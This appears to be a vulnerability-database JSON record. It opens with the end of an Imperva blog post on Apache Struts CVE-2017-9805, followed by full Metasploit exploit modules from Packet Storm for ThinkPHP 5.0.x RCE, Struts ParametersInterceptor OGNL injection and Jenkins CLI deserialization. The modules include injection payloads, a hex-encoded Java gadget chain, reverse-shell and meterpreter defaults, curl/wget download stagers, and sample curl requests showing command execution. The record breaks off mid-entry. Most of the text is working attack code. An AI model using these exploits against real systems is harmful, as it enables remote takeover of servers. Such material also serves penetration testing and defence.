attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-09-08T16:10:08", "type": "impervablog", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2020-04-21T06:58:41", "description": "", "cvss3": {}, "published": "2020-04-14T00:00:00", "type": "packetstorm", "title": "ThinkPHP 5.0.23 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-20062", "CVE-2019-9082"], "modified": "2020-04-14T00:00:00", "id": "PACKETSTORM:157218", "href": "https://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ThinkPHP Multiple PHP Injection RCEs', \n'Description' => %q{ \nThis module exploits one of two PHP injection vulnerabilities in the \nThinkPHP web framework to execute code as the web user. \n \nVersions up to and including 5.0.23 are exploitable, though 5.0.23 is \nvulnerable to a separate vulnerability. The module will automatically \nattempt to detect the version of the software. \n \nTested against versions 5.0.20 and 5.0.23 as can be found on Vulhub. \n}, \n'Author' => [ \n# Discovery by unknown threaty threat actors \n'wvu' # Module \n], \n'References' => [ \n# https://www.google.com/search?q=thinkphp+rce, tbh \n['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP \n['CVE', '2019-9082'], # Open Source BMS 1.1.1 using ThinkPHP \n['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce'] \n], \n'DisclosureDate' => '2018-12-10', # Unknown discovery date \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} \n], \n['Linux Dropper', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# NOTE: You may want to tweak this for long-running commands like find(1) \nOptFloat.new('CmdOutputTimeout', \n[true, 'Timeout for cmd/unix/generic output', 3.5]) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \n=begin \nwvu@kharak:~$ curl -vs \"http://127.0.0.1:8080/index.php?s=$((RANDOM))\" | xmllint --html --xpath 'substring-after(//div[@class = \"copyright\"]/span[1]/text(), \"V\")' - \n* Trying 127.0.0.1... \n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) \n> GET /index.php?s=1353 HTTP/1.1 \n> Host: 127.0.0.1:8080 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> \n< HTTP/1.1 404 Not Found \n< Date: Mon, 13 Apr 2020 06:42:15 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.5 \n< Content-Length: 7332 \n< Content-Type: text/html; charset=utf-8 \n< \n{ [7332 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \n5.0.20wvu@kharak:~$ \n=end \ndef check \n# An unknown route will trigger the ThinkPHP copyright with version \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => {'s' => rand_text_alpha(8..42)} \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m) \nreturn CheckCode::Unknown( \n'Target did not respond with ThinkPHP copyright.' \n) \nend \n \n# Get the first copyright <span> containing the version \nversion = res.get_html_document.at('//div[@class = \"copyright\"]/span')&.text \n \nunless (version = version.scan(/^V([\\d.]+)$/).flatten.first) \nreturn CheckCode::Detected( \n'Target did not respond with ThinkPHP version.' \n) \nend \n \n# Make the parsed version a comparable ivar for automatic exploitation \n@version = Gem::Version.new(version) \n \nif @version <= Gem::Version.new('5.0.23') \nreturn CheckCode::Appears(\"ThinkPHP #{@version} is a vulnerable version.\") \nend \n \nCheckCode::Safe(\"ThinkPHP #{@version} is NOT a vulnerable version.\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# This is just extra insurance in case I screwed up the check method \nunless @version \nfail_with(Failure::NoTarget, 'Could not detect ThinkPHP version') \nend \n \nprint_status(\"Targeting ThinkPHP #{@version} automatically\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# XXX: Only opts[:noconcat] may induce responses from the server \nexecute_cmdstager \nelse # This is just extra insurance in case I screwed up the info hash \nfail_with(Failure::NoTarget, \"Could not select target #{target['Type']}\") \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nif @version < Gem::Version.new('5.0.23') \nexploit_less_than_5_0_23(cmd) \nelsif @version == Gem::Version.new('5.0.23') \nexploit_5_0_23(cmd) \nelse # This is just extra insurance in case I screwed up the exploit method \nfail_with(Failure::NoTarget, \"Could not target ThinkPHP #{@version}\") \nend \nend \n \n=begin \nwvu@kharak:~$ curl -gvs \"http://127.0.0.1:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id\" | head -1 \n* Trying 127.0.0.1... \n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0) \n> GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1 \n> Host: 127.0.0.1:8080 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> \n< HTTP/1.1 200 OK \n< Date: Mon, 13 Apr 2020 06:43:45 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.5 \n< Vary: Accept-Encoding \n< Transfer-Encoding: chunked \n< Content-Type: text/html; charset=UTF-8 \n< \n{ [60 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwvu@kharak:~$ \n=end \ndef exploit_less_than_5_0_23(cmd) \n# XXX: The server may block on executing our payload and won't respond \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => { \n's' => '/Index/\\\\think\\\\app/invokefunction', \n'function' => 'call_user_func_array', \n'vars[0]' => 'system', # TODO: Debug ARCH_PHP \n'vars[1][]' => cmd \n}, \n'partial' => true \n}, datastore['CmdOutputTimeout']) \n \nreturn unless res && res.code == 200 \n \nvprint_good(\"Successfully executed command: #{cmd}\") \n \nreturn unless datastore['PAYLOAD'] == 'cmd/unix/generic' \n \n# HACK: Print half of the doubled-up command output \nvprint_line(res.body[0, res.body.length / 2]) \nend \n \n=begin \nwvu@kharak:~$ curl -vsd \"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id\" http://127.0.0.1:8081/index.php?s=captcha | head -1 \n* Trying 127.0.0.1... \n* TCP_NODELAY set \n* Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0) \n> POST /index.php?s=captcha HTTP/1.1 \n> Host: 127.0.0.1:8081 \n> User-Agent: curl/7.54.0 \n> Accept: */* \n> Content-Length: 72 \n> Content-Type: application/x-www-form-urlencoded \n> \n} [72 bytes data] \n* upload completely sent off: 72 out of 72 bytes \n< HTTP/1.1 200 OK \n< Date: Mon, 13 Apr 2020 06:44:05 GMT \n< Server: Apache/2.4.25 (Debian) \n< X-Powered-By: PHP/7.2.12 \n< Vary: Accept-Encoding \n< Transfer-Encoding: chunked \n< Content-Type: text/html; charset=UTF-8 \n< \n{ [60 bytes data] \n* Connection #0 to host 127.0.0.1 left intact \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwvu@kharak:~$ \n=end \ndef exploit_5_0_23(cmd) \n# XXX: The server may block on executing our payload and won't respond \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'vars_get' => {'s' => 'captcha'}, \n'vars_post' => { \n'_method' => '__construct', \n'filter[]' => 'system', # TODO: Debug ARCH_PHP \n'method' => 'get', \n'server[REQUEST_METHOD]' => cmd \n}, \n'partial' => true \n}, datastore['CmdOutputTimeout']) \n \nreturn unless res && res.code == 200 \n \nvprint_good(\"Successfully executed command: #{cmd}\") \n \nreturn unless datastore['PAYLOAD'] == 'cmd/unix/generic' \n \n# Clean up output from cmd/unix/generic \nvprint_line(res.body.gsub(/\\n<!DOCTYPE html>.*/m, '')) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157218/thinkphp_rce.rb.txt"}, {"lastseen": "2016-12-05T22:16:25", "description": "", "cvss3": {}, "published": "2013-03-22T00:00:00", "type": "packetstorm", "title": "Apache Struts ParametersInterceptor Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3923"], "modified": "2013-03-22T00:00:00", "id": "PACKETSTORM:120908", "href": "https://packetstormsecurity.com/files/120908/Apache-Struts-ParametersInterceptor-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in Apache Struts \nversions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows \nfor the use of parentheses which in turn allows it to interpret parameter values as \nOGNL expressions during certain exception handling for mismatched data types of \nproperties which allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Meder Kydyraliev', # Vulnerability Discovery and PoC \n'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module \n'mihi' #ARCH_JAVA support \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-3923'], \n[ 'OSVDB', '78501'], \n[ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], \n[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] \n], \n'Platform' => [ 'win', 'linux', 'java'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'windows' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n}, \n] \n], \n'DisclosureDate' => 'Oct 01 2011', \n'DefaultTarget' => 2)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',\"username\"]), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', \"/blank-struts2/login.action?INJECT\"]), \nOptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \ninject = \"PARAMETERTOKEN=(#context[\\\"xwork.MethodAccessor.denyMethodExecution\\\"]=+new+java.lang.Boolean(false),#_memberAccess[\\\"allowStaticMethodAccess\\\"]\" \ninject << \"=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true\" \ninject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) \ninject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) \nuri = String.new(datastore['TARGETURI']) \nuri = normalize_uri(uri) \nuri.gsub!(/INJECT/,inject) # append the injection string \nresp = send_request_cgi({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}) \nreturn resp #Used for check function. \nend \n \ndef exploit \n#Set up generic values. \n@payload_exe = rand_text_alphanumeric(4+rand(4)) \npl_exe = generate_payload_exe \nappend = 'false' \n#Now arch specific... \ncase target['Platform'] \nwhen 'linux' \n@payload_exe = \"/tmp/#{@payload_exe}\" \nchmod_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_chmod +x #{@payload_exe}\\\".split(\\\"_\\\"))\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec(\\\"/bin/sh_-c_#{@payload_exe}\\\".split(\\\"_\\\"))\" \nwhen 'java' \n@payload_exe << \".jar\" \npl_exe = payload.encoded_jar.pack \nexec_cmd = \"\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,true),\" \nexec_cmd << \"#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),\" \nexec_cmd << \"#q.setAccessible(true),#q.set(null,false),\" \nexec_cmd << \"#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),\" \nexec_cmd << \"#c=#cl.loadClass('metasploit.Payload'),\" \nexec_cmd << \"#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(\" \nexec_cmd << \"null,new java.lang.Object[]{new java.lang.String[0]})\" \nwhen 'windows' \n@payload_exe = \"./#{@payload_exe}.exe\" \nexec_cmd = \"@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')\" \nelse \nfail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!') \nend \n \n#Now with all the arch specific stuff set, perform the upload. \n#109 = length of command string plus the max length of append. \nsub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length \nchunk_length = 2048 - sub_from_chunk \nchunk_length = ((chunk_length/4).floor)*3 \nwhile pl_exe.length > chunk_length \njava_upload_part(pl_exe[0,chunk_length],@payload_exe,append) \npl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] \nappend = true \nend \njava_upload_part(pl_exe,@payload_exe,append) \nexecute_command(chmod_cmd) if target['Platform'] == 'linux' \nexecute_command(exec_cmd) \nregister_files_for_cleanup(@payload_exe) \nend \n \ndef java_upload_part(part, filename, append = 'false') \ncmd = \"\" \ncmd << \"#f=new java.io.FileOutputStream('#{filename}',#{append}),\" \ncmd << \"#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),\" \ncmd << \"#f.close()\" \nexecute_command(cmd) \nend \n \ndef check \nsleep_time = datastore['CHECK_SLEEPTIME'] \ncheck_cmd = \"@java.lang.Thread@sleep(#{sleep_time * 1000})\" \nt1 = Time.now \nprint_status(\"Asking remote server to sleep for #{sleep_time} seconds\") \nresponse = execute_command(check_cmd) \nt2 = Time.now \ndelta = t2 - t1 \n \n \nif response.nil? \nreturn Exploit::CheckCode::Safe \nelsif delta < sleep_time \nreturn Exploit::CheckCode::Safe \nelse \nreturn Exploit::CheckCode::Appears \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/120908/struts_code_exec_parameters.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-09-22T18:47:02", "description": "", "cvss3": {}, "published": "2020-09-22T00:00:00", "type": "packetstorm", "title": "Jenkins 2.56 CLI Deserialization / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-1000353"], "modified": "2020-09-22T00:00:00", "id": "PACKETSTORM:159266", "href": "https://packetstormsecurity.com/files/159266/Jenkins-2.56-CLI-Deserialization-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \nprepend Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Jenkins CLI Deserialization', \n'Description' => %q{ \nAn unauthenticated Java object deserialization vulnerability exists \nin the CLI component for Jenkins versions `v2.56` and below. \n \nThe `readFrom` method within the `Command` class in the Jenkins \nCLI remoting component deserializes objects received from clients without \nfirst checking / sanitizing the data. Because of this, a malicious serialized \nobject contained within a serialized `SignedObject` can be sent to the Jenkins \nendpoint to achieve code execution on the target. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'SSD', # PoC \n'Unknown', # Vulnerability discovery \n'Shelby Pace' # Metasploit module \n], \n'References' => \n[ \n[ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'], \n[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'], \n[ 'CVE', '2017-1000353'] \n], \n'Privileged' => false, \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Targets' => \n[ \n[ \n'Linux', \n{ \n'Platform' => 'linux', \n'CmdStagerFlavor' => [ 'wget', 'curl' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n] \n], \n'DisclosureDate' => '2017-04-26', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ]) \n] \n) \nend \n \ndef check \nlogin_uri = normalize_uri(target_uri.path, 'login') \nlogin_res = send_request_cgi( \n'method' => 'GET', \n'uri' => login_uri \n) \n \nreturn Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res \n \n/Jenkins\\s+ver\\.\\s+(?<version>\\d+(?:\\.\\d+)*)/ =~ login_res.body \nreturn Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version \n \nvers_no = Gem::Version.new(version) \nreturn Exploit::CheckCode::Appears(\"Jenkins version #{version} detected\") if vers_no < Gem::Version.new('2.54') \n \nExploit::CheckCode::Detected \nend \n \ndef exploit \nprint_status('Sending payload...') \nexecute_cmdstager(noconcat: true) \nend \n \ndef format_payload(payload_data) \nformatted_payload = '74' \nformatted_payload << payload_data.length.to_s(16).rjust(4, '0') \nformatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \ndef execute_command(cmd, _opts = {}) \nsess_uuid = SecureRandom.uuid \nsess_uri = normalize_uri(target_uri.path, 'cli') \npreamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=' \n \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'headers' => \n{ \n'Side' => 'download', \n'Session' => sess_uuid \n} \n}, \nnil, false \n) # don't wait for response, and don't disconnect \n \ncmd = build_obj(cmd) \nsend_request_cgi( \n{ \n'uri' => sess_uri, \n'method' => 'POST', \n'data' => preamble + [ cmd ].pack('H*'), \n'headers' => \n{ \n'Side' => 'upload', \n'Session' => sess_uuid \n} \n} \n) \nsleep(2) # give buffer time between requests for processing \nend \n \ndef build_obj(obj_data) \npayload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61' \npayload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742' \npayload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265' \npayload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5' \npayload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e' \npayload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726' \npayload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63' \npayload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6' \npayload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f' \npayload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537' \npayload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44' \npayload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6' \npayload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a' \npayload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7' \npayload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163' \npayload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6' \npayload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954' \npayload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657' \npayload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8' \npayload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436' \npayload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c' \npayload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7' \npayload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f' \npayload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547' \npayload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c' \npayload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700' \npayload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078' \npayload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106' \npayload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013' \npayload_data << '75720013' \npayload_data << '5b4c6a6176612e6c616e672e537472696e673b' \npayload_data << 'add256e7e91d7b47' \npayload_data << '020000' \npayload_data << '7870' \npayload_data << '00000001' \n \nobj_data = format_payload(obj_data) \npayload_data << obj_data \n \npayload_data << '740004' \npayload_data << '65786563' # exec \npayload_data << '7571007e0' \npayload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578' \npayload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700' \npayload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878' \npayload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266' \n \n# This index is the length of the serialized \n# object that belongs to the SignedObject \nstart_arr = payload_data.index('050daced') \nend_arr = payload_data.index('787571007e') \nnew_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2) \npayload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0') \n \npayload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72' \npayload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000' \npayload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c' \npayload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707' \npayload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c' \npayload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136' \npayload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878' \npayload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078' \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159266/jenkins_cli_deserialization.rb.txt"}, {"lastseen": "2016-12-05T22:18:36", "description": "", "cvss3": {}, "published": "2011-10-03T00:00:00", "type": "packetstorm", "title": "JBoss addURL Misconfiguration Attack", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0738"], "modified": "2011-10-03T00:00:00", "id": "PACKETSTORM:105520", "href": 